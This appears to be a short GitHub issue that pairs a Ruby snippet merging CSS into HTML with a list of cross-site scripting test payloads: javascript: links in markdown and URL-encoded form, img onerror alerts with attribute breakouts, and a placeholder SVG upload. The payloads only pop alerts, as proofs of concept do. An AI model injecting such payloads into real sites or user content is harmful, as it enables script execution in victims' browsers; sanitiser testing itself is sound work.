Open alish244 opened 3 months ago
doc = load_html(html)
options = @options.merge(css_string: CSSHelper.css_for_doc(doc))
super(doc.to_s, options)
">
%3Ca+href%3D%22%01java%03script%3Aconfirm%28document.domain%29%22%3EClick+to+execute%3Ca%3E%0D%0A
[Click Me](javascript:alert('Uh oh...'))
<img src="" onerror="alert('XSS') alt="Uh oh...">
"><img src="" onerror="alert('XSS') alt="Uh oh...">
\
<javascript:alert('XSS')>
[a](Javascript:alert(1))
\
![Uploading xss_svg - Copy.svg…]()
' vakzz=here